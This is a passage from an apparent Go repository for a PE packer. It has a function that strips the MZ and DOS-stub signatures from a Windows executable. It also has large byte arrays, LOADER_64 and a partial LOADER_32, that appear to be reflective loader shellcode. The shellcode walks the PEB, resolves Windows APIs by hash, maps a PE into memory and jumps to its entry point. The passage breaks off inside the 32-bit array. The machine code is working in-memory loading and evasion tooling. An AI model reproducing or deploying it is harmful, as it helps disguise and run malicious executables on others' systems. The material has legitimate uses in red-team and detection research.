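// The file's own buffer is not modified. Returns ErrInvalidPeHeaders when the
// image does not start with "MZ".
func (pe *PE) ScrapePeHeaders() ([]byte, error) {
	rawFile, err := pe.file.Bytes()
	if err != nil {
		return nil, err
	}
	return scrapeHeaderBytes(rawFile)
}

// scrapeHeaderBytes zeroes the MZ magic and, when present, the first
// occurrence of the DOS stub message in a copy of raw. A missing stub message
// is not an error: not every PE carries the standard stub and the loader does
// not need it. (The previous version had the condition inverted and failed on
// every image that did contain the message.)
func scrapeHeaderBytes(raw []byte) ([]byte, error) {
	if len(raw) < 2 || raw[0] != 'M' || raw[1] != 'Z' {
		return nil, ErrInvalidPeHeaders
	}
	// Work on a copy so the caller's (and pe.file's) buffer stays untouched.
	out := append([]byte(nil), raw...)
	out[0], out[1] = 0, 0
	if i := bytes.Index(out, []byte(PE_DOS_STUB)); i >= 0 {
		for j := i; j < i+len(PE_DOS_STUB); j++ {
			out[j] = 0
		}
	}
	return out, nil
}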
207 |
--------------------------------------------------------------------------------
/pkg/static.go:
--------------------------------------------------------------------------------
1 | package amber
2 |
3 | var LOADER_64 = []byte{
4 | 0x5e, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0xf1, 0xe8, 0x97, 0x00, 0x00,
5 | 0x00, 0x48, 0x89, 0xc7, 0x48, 0x89, 0xf9, 0xe8, 0xdf, 0x02, 0x00, 0x00,
6 | 0x48, 0x89, 0xf9, 0xe8, 0x46, 0x02, 0x00, 0x00, 0x48, 0x89, 0xf9, 0xe8,
7 | 0xf2, 0x05, 0x00, 0x00, 0x48, 0x89, 0xf9, 0xe8, 0x9b, 0x07, 0x00, 0x00,
8 | 0x48, 0x31, 0xc0, 0x8b, 0x47, 0x3c, 0x8b, 0x44, 0x07, 0x28, 0x48, 0x01,
9 | 0xf8, 0xe9, 0x9d, 0x08, 0x00, 0x00, 0x56, 0x57, 0x48, 0x89, 0xcf, 0x48,
10 | 0x89, 0xd6, 0x4c, 0x89, 0xc1, 0xf3, 0xa4, 0x5f, 0x5e, 0xc3, 0x66, 0x85,
11 | 0xd2, 0x74, 0x24, 0x49, 0x89, 0xc8, 0x0f, 0xb7, 0xd2, 0x8d, 0x42, 0xff,
12 | 0x48, 0x8d, 0x54, 0x01, 0x01, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xf2, 0x41,
13 | 0x0f, 0x38, 0xf0, 0x00, 0x49, 0x83, 0xc0, 0x01, 0x49, 0x39, 0xd0, 0x75,
14 | 0xf1, 0xeb, 0x21, 0x0f, 0xb6, 0x11, 0x84, 0xd2, 0x74, 0x1b, 0x48, 0x83,
15 | 0xc1, 0x01, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xf2, 0x0f, 0x38, 0xf0, 0xc2,
16 | 0x48, 0x83, 0xc1, 0x01, 0x0f, 0xb6, 0x51, 0xff, 0x84, 0xd2, 0x75, 0xef,
17 | 0xc3, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0xf8, 0x55, 0x57, 0x56, 0x53,
18 | 0x48, 0x83, 0xec, 0x48, 0x48, 0x89, 0xcd, 0x48, 0x63, 0x79, 0x3c, 0x48,
19 | 0x01, 0xcf, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x81, 0x3f, 0x50, 0x45, 0x00,
20 | 0x00, 0x0f, 0x85, 0xa1, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x38,
21 | 0x00, 0x00, 0x00, 0x00, 0x8b, 0x47, 0x50, 0x48, 0x89, 0x44, 0x24, 0x30,
22 | 0x48, 0x8d, 0x54, 0x24, 0x38, 0xc7, 0x44, 0x24, 0x28, 0x04, 0x00, 0x00,
23 | 0x00, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x30, 0x10, 0x00, 0x4c, 0x8d, 0x4c,
24 | 0x24, 0x30, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc1, 0xff,
25 | 0xff, 0xff, 0xff, 0x41, 0xba, 0x55, 0x7c, 0xce, 0x99, 0xe8, 0x1b, 0x07,
26 | 0x00, 0x00, 0xff, 0xd0, 0x89, 0xc2, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x85,
27 | 0xd2, 0x78, 0x51, 0x44, 0x8b, 0x47, 0x54, 0x48, 0x89, 0xea, 0x48, 0x8b,
28 | 0x4c, 0x24, 0x38, 0xe8, 0x1a, 0xff, 0xff, 0xff, 0x0f, 0xb7, 0x47, 0x14,
29 | 0x48, 0x8d, 0x5c, 0x07, 0x18, 0x66, 0x83, 0x7f, 0x06, 0x00, 0x74, 0x2b,
30 | 0xbe, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x4b, 0x0c, 0x48, 0x03, 0x4c, 0x24,
31 | 0x38, 0x8b, 0x53, 0x14, 0x48, 0x01, 0xea, 0x44, 0x8b, 0x43, 0x10, 0xe8,
32 | 0xee, 0xfe, 0xff, 0xff, 0x83, 0xc6, 0x01, 0x48, 0x83, 0xc3, 0x28, 0x0f,
33 | 0xb7, 0x47, 0x06, 0x39, 0xf0, 0x7f, 0xda, 0x48, 0x8b, 0x44, 0x24, 0x38,
34 | 0x48, 0x83, 0xc4, 0x48, 0x5b, 0x5e, 0x5f, 0x5d, 0xc3, 0x57, 0x48, 0x81,
35 | 0xec, 0x50, 0x02, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0xc7, 0x84, 0x24,
36 | 0x48, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x84, 0x24, 0x34,
37 | 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x7c, 0x24, 0x20,
38 | 0xb9, 0x41, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xf3, 0x48,
39 | 0xab, 0x41, 0x80, 0x38, 0x00, 0x0f, 0x84, 0x94, 0x00, 0x00, 0x00, 0xba,
40 | 0x01, 0x00, 0x00, 0x00, 0x48, 0x89, 0xd0, 0x48, 0x83, 0xc2, 0x01, 0x41,
41 | 0x80, 0x7c, 0x10, 0xff, 0x00, 0x75, 0xf1, 0x8d, 0x14, 0x00, 0x66, 0x89,
42 | 0x94, 0x24, 0x30, 0x02, 0x00, 0x00, 0x83, 0xc2, 0x02, 0x66, 0x89, 0x94,
43 | 0x24, 0x32, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x54, 0x24, 0x20, 0x48, 0x89,
44 | 0x94, 0x24, 0x38, 0x02, 0x00, 0x00, 0x83, 0xe8, 0x01, 0x78, 0x15, 0x48,
45 | 0x98, 0x66, 0x41, 0x0f, 0xbe, 0x14, 0x00, 0x66, 0x89, 0x54, 0x44, 0x20,
46 | 0x48, 0x83, 0xe8, 0x01, 0x85, 0xc0, 0x79, 0xed, 0x4c, 0x8d, 0x8c, 0x24,
47 | 0x48, 0x02, 0x00, 0x00, 0x4c, 0x8d, 0x84, 0x24, 0x30, 0x02, 0x00, 0x00,
48 | 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41, 0xba,
49 | 0xa4, 0xb9, 0xeb, 0xb4, 0xe8, 0x00, 0x06, 0x00, 0x00, 0xff, 0xd0, 0x85,
50 | 0xc0, 0x78, 0x11, 0x48, 0x8b, 0x84, 0x24, 0x48, 0x02, 0x00, 0x00, 0x48,
51 | 0x81, 0xc4, 0x50, 0x02, 0x00, 0x00, 0x5f, 0xc3, 0xb8, 0x00, 0x00, 0x00,
52 | 0x00, 0xeb, 0xf0, 0x66, 0xc7, 0x84, 0x24, 0x30, 0x02, 0x00, 0x00, 0x00,
53 | 0x00, 0x66, 0xc7, 0x84, 0x24, 0x32, 0x02, 0x00, 0x00, 0x02, 0x00, 0x48,
54 | 0x8d, 0x44, 0x24, 0x20, 0x48, 0x89, 0x84, 0x24, 0x38, 0x02, 0x00, 0x00,
55 | 0xeb, 0x9a, 0x49, 0x89, 0xc9, 0x48, 0x63, 0x51, 0x3c, 0x48, 0x01, 0xca,
56 | 0x8b, 0x82, 0xb0, 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x85,
57 | 0xc0, 0x74, 0x75, 0x89, 0xc0, 0x49, 0x8d, 0x0c, 0x01, 0x4d, 0x89, 0xca,
58 | 0x4c, 0x2b, 0x52, 0x30, 0x83, 0x39, 0x00, 0x75, 0x4a, 0xb9, 0x01, 0x00,
59 | 0x00, 0x00, 0xeb, 0x5c, 0x8b, 0x11, 0x44, 0x0f, 0xb7, 0x00, 0x41, 0x81,
60 | 0xe0, 0xff, 0x0f, 0x00, 0x00, 0x4c, 0x01, 0xc2, 0x4d, 0x01, 0x14, 0x11,
61 | 0x48, 0x83, 0xc0, 0x02, 0x8b, 0x51, 0x04, 0x48, 0x01, 0xca, 0x48, 0x39,
62 | 0xd0, 0x74, 0x18, 0x0f, 0xb6, 0x50, 0x01, 0x41, 0x89, 0xd0, 0x41, 0x83,
63 | 0xe0, 0xf0, 0x41, 0x80, 0xf8, 0xa0, 0x74, 0xcc, 0x80, 0xfa, 0x0f, 0x76,
64 | 0xdb, 0xeb, 0xd9, 0x48, 0x89, 0xc1, 0x83, 0x39, 0x00, 0x74, 0x14, 0x48,
65 | 0x8d, 0x41, 0x08, 0x8b, 0x51, 0x04, 0x48, 0x01, 0xca, 0x48, 0x39, 0xd0,
66 | 0x75, 0xd1, 0x48, 0x89, 0xd1, 0xeb, 0xe7, 0xb9, 0x01, 0x00, 0x00, 0x00,
67 | 0x89, 0xc8, 0xc3, 0x41, 0x54, 0x55, 0x57, 0x56, 0x53, 0x48, 0x83, 0xec,
68 | 0x20, 0x48, 0x89, 0xcd, 0x48, 0x63, 0x41, 0x3c, 0x8b, 0x84, 0x01, 0x90,
69 | 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84,
70 | 0xb0, 0x00, 0x00, 0x00, 0x89, 0xc0, 0x4c, 0x8d, 0x24, 0x01, 0x41, 0x8b,
71 | 0x4c, 0x24, 0x0c, 0x85, 0xc9, 0x75, 0x6a, 0xba, 0x01, 0x00, 0x00, 0x00,
72 | 0xe9, 0x97, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89,
73 | 0xf9, 0xe8, 0x97, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x03, 0x48,
74 | 0x89, 0x06, 0x48, 0x83, 0xc3, 0x08, 0x48, 0x83, 0xc6, 0x08, 0x4c, 0x8b,
75 | 0x03, 0x4d, 0x85, 0xc0, 0x74, 0x2e, 0x4d, 0x85, 0xc0, 0x78, 0xd6, 0x4a,
76 | 0x8d, 0x4c, 0x05, 0x02, 0xba, 0x00, 0x00, 0x00, 0x00, 0xe8, 0xe4, 0xfc,
77 | 0xff, 0xff, 0x89, 0xc2, 0x41, 0xb8, 0xff, 0xff, 0xff, 0xff, 0x48, 0x89,
78 | 0xf9, 0xe8, 0x5b, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0xc7, 0x48,
79 | 0x89, 0x06, 0xeb, 0xc2, 0x49, 0x83, 0xc4, 0x14, 0x41, 0x8b, 0x4c, 0x24,
80 | 0x0c, 0x85, 0xc9, 0x74, 0x2b, 0x89, 0xc9, 0x48, 0x01, 0xe9, 0xe8, 0xd2,
81 | 0xfd, 0xff, 0xff, 0x48, 0x89, 0xc7, 0x48, 0x85, 0xc0, 0x74, 0x20, 0x41,
82 | 0x8b, 0x1c, 0x24, 0x48, 0x01, 0xeb, 0x41, 0x8b, 0x74, 0x24, 0x10, 0x48,
83 | 0x01, 0xee, 0x4c, 0x8b, 0x03, 0x4d, 0x85, 0xc0, 0x75, 0x9c, 0xeb, 0xc8,
84 | 0xba, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x05, 0xba, 0x00, 0x00, 0x00, 0x00,
85 | 0x89, 0xd0, 0x48, 0x83, 0xc4, 0x20, 0x5b, 0x5e, 0x5f, 0x5d, 0x41, 0x5c,
86 | 0xc3, 0x41, 0x57, 0x41, 0x56, 0x41, 0x55, 0x41, 0x54, 0x55, 0x57, 0x56,
87 | 0x53, 0x48, 0x81, 0xec, 0x58, 0x02, 0x00, 0x00, 0x48, 0x89, 0xcb, 0x41,
88 | 0x89, 0xd5, 0x44, 0x89, 0xc5, 0x48, 0x63, 0x41, 0x3c, 0x48, 0x01, 0xc8,
89 | 0x8b, 0xb0, 0x88, 0x00, 0x00, 0x00, 0x48, 0x01, 0xce, 0x8b, 0x80, 0x8c,
90 | 0x00, 0x00, 0x00, 0x89, 0x44, 0x24, 0x2c, 0x44, 0x8b, 0x66, 0x20, 0x44,
91 | 0x8b, 0x76, 0x1c, 0x44, 0x8b, 0x7e, 0x24, 0x8b, 0x46, 0x18, 0x85, 0xc0,
92 | 0x0f, 0x84, 0x97, 0x01, 0x00, 0x00, 0x89, 0xc0, 0x48, 0x89, 0x44, 0x24,
93 | 0x20, 0xbf, 0x00, 0x00, 0x00, 0x00, 0x49, 0x01, 0xcc, 0x41, 0x8b, 0x0c,
94 | 0xbc, 0x48, 0x01, 0xd9, 0xba, 0x00, 0x00, 0x00, 0x00, 0xe8, 0x0c, 0xfc,
95 | 0xff, 0xff, 0x39, 0xfd, 0x74, 0x1a, 0x44, 0x39, 0xe8, 0x74, 0x15, 0x48,
96 | 0x83, 0xc7, 0x01, 0x48, 0x39, 0x7c, 0x24, 0x20, 0x75, 0xdb, 0xb8, 0x00,
97 | 0x00, 0x00, 0x00, 0xe9, 0x2d, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x04, 0x7b,
98 | 0x42, 0x0f, 0xb7, 0x04, 0x38, 0x48, 0x8d, 0x04, 0x83, 0x42, 0x8b, 0x04,
99 | 0x30, 0x48, 0x01, 0xc3, 0x48, 0x39, 0xf3, 0x0f, 0x82, 0x0d, 0x01, 0x00,
100 | 0x00, 0x8b, 0x44, 0x24, 0x2c, 0x48, 0x01, 0xc6, 0x48, 0x39, 0xf3, 0x0f,
101 | 0x83, 0xfd, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x30, 0x00, 0x00,
102 | 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x38, 0x00, 0x00, 0x00, 0x00, 0x48,
103 | 0x8d, 0x7c, 0x24, 0x40, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x1e, 0x00,
104 | 0x00, 0x00, 0xf3, 0x48, 0xab, 0xc7, 0x07, 0x00, 0x00, 0x00, 0x00, 0x48,
105 | 0xc7, 0x84, 0x24, 0x40, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48,
106 | 0xc7, 0x84, 0x24, 0x48, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48,
107 | 0x8d, 0xbc, 0x24, 0x50, 0x01, 0x00, 0x00, 0xb9, 0x1e, 0x00, 0x00, 0x00,
108 | 0xf3, 0x48, 0xab, 0xc7, 0x07, 0x00, 0x00, 0x00, 0x00, 0x80, 0x3b, 0x2e,
109 | 0x0f, 0x84, 0xb3, 0x00, 0x00, 0x00, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x49,
110 | 0x89, 0xc0, 0x48, 0x83, 0xc0, 0x01, 0x80, 0x7c, 0x03, 0xff, 0x2e, 0x75,
111 | 0xf2, 0x44, 0x89, 0xc6, 0x48, 0x8d, 0x4c, 0x24, 0x30, 0x48, 0x89, 0xda,
112 | 0xe8, 0x2d, 0xfb, 0xff, 0xff, 0x8d, 0x4e, 0x01, 0x48, 0x63, 0xc9, 0x48,
113 | 0x01, 0xd9, 0x80, 0x39, 0x00, 0x0f, 0x84, 0x8e, 0x00, 0x00, 0x00, 0xb8,
114 | 0x01, 0x00, 0x00, 0x00, 0x48, 0x63, 0xd6, 0x48, 0x01, 0xda, 0x49, 0x89,
115 | 0xc0, 0x48, 0x83, 0xc0, 0x01, 0x80, 0x3c, 0x02, 0x00, 0x75, 0xf3, 0x48,
116 | 0x8d, 0x84, 0x24, 0x40, 0x01, 0x00, 0x00, 0x48, 0x89, 0xca, 0x48, 0x89,
117 | 0xc1, 0xe8, 0xf0, 0xfa, 0xff, 0xff, 0x48, 0x8d, 0x4c, 0x24, 0x30, 0xe8,
118 | 0x15, 0xfc, 0xff, 0xff, 0x48, 0x89, 0xc3, 0xb8, 0x00, 0x00, 0x00, 0x00,
119 | 0x48, 0x85, 0xdb, 0x74, 0x28, 0x48, 0x8d, 0x8c, 0x24, 0x40, 0x01, 0x00,
120 | 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xe8, 0xd7, 0xfa, 0xff, 0xff, 0x89,
121 | 0xc2, 0x41, 0xb8, 0xff, 0xff, 0xff, 0xff, 0x48, 0x89, 0xd9, 0xe8, 0x4e,
122 | 0xfe, 0xff, 0xff, 0x48, 0x89, 0xc3, 0x48, 0x89, 0xd8, 0x48, 0x81, 0xc4,
123 | 0x58, 0x02, 0x00, 0x00, 0x5b, 0x5e, 0x5f, 0x5d, 0x41, 0x5c, 0x41, 0x5d,
124 | 0x41, 0x5e, 0x41, 0x5f, 0xc3, 0xbe, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb8,
125 | 0x00, 0x00, 0x00, 0x00, 0xe9, 0x53, 0xff, 0xff, 0xff, 0x41, 0xb8, 0x00,
126 | 0x00, 0x00, 0x00, 0xeb, 0x82, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0xcd,
127 | 0x57, 0x56, 0x53, 0x48, 0x83, 0xec, 0x20, 0x89, 0xce, 0x65, 0x48, 0x8b,
128 | 0x04, 0x25, 0x60, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8d,
129 | 0x78, 0x20, 0x48, 0x8b, 0x58, 0x20, 0x48, 0x39, 0xdf, 0x74, 0x2c, 0x0f,
130 | 0xb7, 0x53, 0x48, 0x48, 0x8b, 0x4b, 0x50, 0xe8, 0x5e, 0xfa, 0xff, 0xff,
131 | 0x39, 0xf0, 0x74, 0x0f, 0x48, 0x8b, 0x1b, 0x48, 0x39, 0xdf, 0x75, 0xe7,
132 | 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x04, 0x48, 0x8b, 0x43, 0x20, 0x48,
133 | 0x83, 0xc4, 0x20, 0x5b, 0x5e, 0x5f, 0xc3, 0xb8, 0x00, 0x00, 0x00, 0x00,
134 | 0xeb, 0xf1, 0x41, 0x56, 0x41, 0x55, 0x41, 0x54, 0x55, 0x57, 0x56, 0x53,
135 | 0x48, 0x83, 0xec, 0x50, 0x48, 0x89, 0xcd, 0x48, 0x63, 0x79, 0x3c, 0x48,
136 | 0x01, 0xcf, 0x0f, 0xb7, 0x47, 0x14, 0x48, 0x8d, 0x5c, 0x07, 0x18, 0x48,
137 | 0xc7, 0x44, 0x24, 0x48, 0x00, 0x00, 0x00, 0x00, 0x66, 0x83, 0x7f, 0x06,
138 | 0x00, 0x74, 0x69, 0xbe, 0x00, 0x00, 0x00, 0x00, 0x41, 0xbc, 0x00, 0x00,
139 | 0x00, 0x00, 0x4c, 0x8d, 0x74, 0x24, 0x40, 0x4c, 0x8d, 0x6c, 0x24, 0x48,
140 | 0xe9, 0x1f, 0x01, 0x00, 0x00, 0xb9, 0x01, 0x00, 0x00, 0x00, 0x25, 0x00,
141 | 0x00, 0x00, 0x60, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x3d, 0x00, 0x00,
142 | 0x00, 0x60, 0x41, 0xb9, 0x20, 0x00, 0x00, 0x00, 0xb8, 0x80, 0x00, 0x00,
143 | 0x00, 0x44, 0x0f, 0x45, 0xc8, 0xe9, 0x8c, 0x00, 0x00, 0x00, 0x41, 0xb9,
144 | 0x20, 0x00, 0x00, 0x00, 0xe9, 0x91, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00,
145 | 0x00, 0x00, 0xeb, 0x05, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4,
146 | 0x50, 0x5b, 0x5e, 0x5f, 0x5d, 0x41, 0x5c, 0x41, 0x5d, 0x41, 0x5e, 0xc3,
147 | 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb, 0xea, 0xb9, 0x01, 0x00, 0x00, 0x00,
148 | 0x45, 0x89, 0xe0, 0x41, 0xb9, 0x10, 0x00, 0x00, 0x00, 0xeb, 0x3f, 0x44,
149 | 0x89, 0xe1, 0xa9, 0x00, 0x00, 0x00, 0x20, 0x74, 0x32, 0xb9, 0x00, 0x00,
150 | 0x00, 0x00, 0x85, 0xc0, 0x78, 0x8c, 0x89, 0xc1, 0xc1, 0xe9, 0x1f, 0x41,
151 | 0x89, 0xc8, 0x44, 0x89, 0xe1, 0x41, 0xb9, 0x10, 0x00, 0x00, 0x00, 0xeb,
152 | 0x19, 0xa9, 0x00, 0x00, 0x00, 0x20, 0x0f, 0x85, 0x69, 0xff, 0xff, 0xff,
153 | 0xb9, 0x01, 0x00, 0x00, 0x00, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x45,
154 | 0x89, 0xe0, 0x25, 0x00, 0x00, 0x00, 0x60, 0x3d, 0x00, 0x00, 0x00, 0x60,
155 | 0x0f, 0x84, 0x74, 0xff, 0xff, 0xff, 0x84, 0xc9, 0x74, 0x0c, 0x45, 0x84,
156 | 0xc0, 0xb8, 0x40, 0x00, 0x00, 0x00, 0x44, 0x0f, 0x45, 0xc8, 0x8b, 0x42,
157 | 0x0c, 0x48, 0x01, 0xe8, 0x48, 0x89, 0x44, 0x24, 0x48, 0x8b, 0x42, 0x10,
158 | 0x48, 0x89, 0x44, 0x24, 0x40, 0xc7, 0x44, 0x24, 0x3c, 0x00, 0x00, 0x00,
159 | 0x00, 0x48, 0x8d, 0x44, 0x24, 0x3c, 0x48, 0x89, 0x44, 0x24, 0x20, 0x4d,
160 | 0x89, 0xf0, 0x4c, 0x89, 0xea, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff,
161 | 0x41, 0xba, 0x41, 0x4d, 0xde, 0x6e, 0xe8, 0xbe, 0x00, 0x00, 0x00, 0xff,
162 | 0xd0, 0x85, 0xc0, 0x0f, 0x88, 0x28, 0xff, 0xff, 0xff, 0x83, 0xc6, 0x01,
163 | 0x48, 0x83, 0xc3, 0x28, 0x0f, 0xb7, 0x47, 0x06, 0x39, 0xf0, 0x0f, 0x8e,
164 | 0x1c, 0xff, 0xff, 0xff, 0x48, 0x89, 0xda, 0x8b, 0x43, 0x24, 0x85, 0xc0,
165 | 0x74, 0xe3, 0x41, 0x89, 0xc1, 0x41, 0xc1, 0xf9, 0x1f, 0x41, 0x83, 0xe1,
166 | 0xc8, 0x41, 0x83, 0xc1, 0x40, 0xa9, 0x00, 0x00, 0x00, 0x40, 0x0f, 0x84,
167 | 0x23, 0xff, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x88, 0x41, 0xff, 0xff, 0xff,
168 | 0xa9, 0x00, 0x00, 0x00, 0x20, 0x0f, 0x85, 0x00, 0xff, 0xff, 0xff, 0xb9,
169 | 0x01, 0x00, 0x00, 0x00, 0x41, 0xb9, 0x02, 0x00, 0x00, 0x00, 0xe9, 0x3c,
170 | 0xff, 0xff, 0xff, 0x56, 0x53, 0x48, 0x83, 0xec, 0x28, 0x48, 0x89, 0xce,
171 | 0x48, 0x63, 0x41, 0x3c, 0x8b, 0x84, 0x01, 0xd0, 0x00, 0x00, 0x00, 0xba,
172 | 0x00, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x11, 0x89, 0xc0, 0x48, 0x8b,
173 | 0x5c, 0x01, 0x18, 0xba, 0x01, 0x00, 0x00, 0x00, 0x48, 0x85, 0xdb, 0x75,
174 | 0x1d, 0x89, 0xd0, 0x48, 0x83, 0xc4, 0x28, 0x5b, 0x5e, 0xc3, 0x41, 0xb8,
175 | 0x00, 0x00, 0x00, 0x00, 0xba, 0x01, 0x00, 0x00, 0x00, 0x48, 0x89, 0xf1,
176 | 0xff, 0xd0, 0x48, 0x83, 0xc3, 0x08, 0x48, 0x8b, 0x03, 0x48, 0x85, 0xc0,
177 | 0x75, 0xe4, 0xba, 0x01, 0x00, 0x00, 0x00, 0xeb, 0xd4, 0x41, 0x51, 0x41,
178 | 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60,
179 | 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50,
180 | 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac,
181 | 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xf2, 0x44, 0x0f, 0x38, 0xf0, 0xc8,
182 | 0xe2, 0xee, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c,
183 | 0x48, 0x01, 0xd0, 0x66, 0x81, 0x78, 0x18, 0x0b, 0x02, 0x75, 0x65, 0x8b,
184 | 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x5a, 0x48, 0x01,
185 | 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0,
186 | 0xe3, 0x49, 0x4c, 0x8b, 0x4c, 0x24, 0x08, 0x48, 0xff, 0xc9, 0x41, 0x8b,
187 | 0x34, 0x88, 0x48, 0x01, 0xd6, 0x48, 0x31, 0xc0, 0xac, 0xf2, 0x44, 0x0f,
188 | 0x38, 0xf0, 0xc8, 0x38, 0xe0, 0x75, 0xf2, 0x45, 0x39, 0xd1, 0x75, 0xdc,
189 | 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c,
190 | 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88,
191 | 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58,
192 | 0x41, 0x59, 0xc3, 0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x5d,
193 | 0xff, 0xff, 0xff, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x59, 0x48, 0x29, 0xf1,
194 | 0x48, 0x83, 0xc1, 0x11, 0x48, 0x89, 0xf7, 0x48, 0x83, 0xef, 0x05, 0xf3,
195 | 0xaa, 0xfc, 0x48, 0x89, 0xec, 0x5d, 0xff, 0xe0,
196 | }
197 |
198 | var LOADER_32 = []byte{
199 | 0x5e, 0x55, 0x89, 0xe5, 0x56, 0xe8, 0x8d, 0x00, 0x00, 0x00, 0x5e, 0x50,
200 | 0xe8, 0x52, 0x02, 0x00, 0x00, 0xe8, 0xd0, 0x02, 0x00, 0x00, 0xe8, 0xac,
201 | 0x05, 0x00, 0x00, 0xe8, 0x1f, 0x07, 0x00, 0x00, 0x5f, 0x8b, 0x47, 0x3c,
202 | 0x8b, 0x44, 0x07, 0x28, 0x01, 0xf8, 0xe9, 0xe3, 0x07, 0x00, 0x00, 0x55,
203 | 0x89, 0xe5, 0x56, 0x57, 0x51, 0x8b, 0x7d, 0x08, 0x8b, 0x75, 0x0c, 0x8b,
204 | 0x4d, 0x10, 0xf3, 0xa4, 0x59, 0x5f, 0x5e, 0x89, 0xec, 0x5d, 0xc3, 0x8b,
205 | 0x44, 0x24, 0x04, 0x8b, 0x54, 0x24, 0x08, 0x66, 0x85, 0xd2, 0x74, 0x1a,
206 | 0x89, 0xc1, 0x0f, 0xb7, 0xd2, 0x01, 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00,
207 | 0xf2, 0x0f, 0x38, 0xf0, 0x11, 0x83, 0xc1, 0x01, 0x39, 0xc1, 0x75, 0xf4,
208 | 0xeb, 0x1f, 0x0f, 0xb6, 0x08, 0x84, 0xc9, 0x74, 0x1b, 0x83, 0xc0, 0x01,
209 | 0xba, 0x00, 0x00, 0x00, 0x00, 0xf2, 0x0f, 0x38, 0xf0, 0xd1, 0x83, 0xc0,
210 | 0x01, 0x0f, 0xb6, 0x48, 0xff, 0x84, 0xc9, 0x75, 0xf0, 0x89, 0xd0, 0xc3,
211 | 0xba, 0x00, 0x00, 0x00, 0x00, 0xeb, 0xf6, 0x55, 0x57, 0x56, 0x53, 0x83,
212 | 0xec, 0x3c, 0x8b, 0x6c, 0x24, 0x50, 0x89, 0xef, 0x03, 0x7d, 0x3c, 0xb8,
213 | 0x00, 0x00, 0x00, 0x00, 0x81, 0x3f, 0x50, 0x45, 0x00, 0x00, 0x0f, 0x85,
214 | 0xb7, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x2c, 0x00, 0x00, 0x00, 0x00,
215 | 0x8b, 0x47, 0x50, 0x89, 0x44, 0x24, 0x28, 0xc7, 0x44, 0x24, 0x14, 0x04,
216 | 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00, 0x30, 0x10, 0x00, 0x8d,
217 | 0x44, 0x24, 0x28, 0x89, 0x44, 0x24, 0x0c, 0xc7, 0x44, 0x24, 0x08, 0x00,
218 | 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x2c, 0x89, 0x44, 0x24, 0x04, 0xc7,
219 | 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0x68, 0x55, 0x7c, 0xce, 0x99, 0xe8,
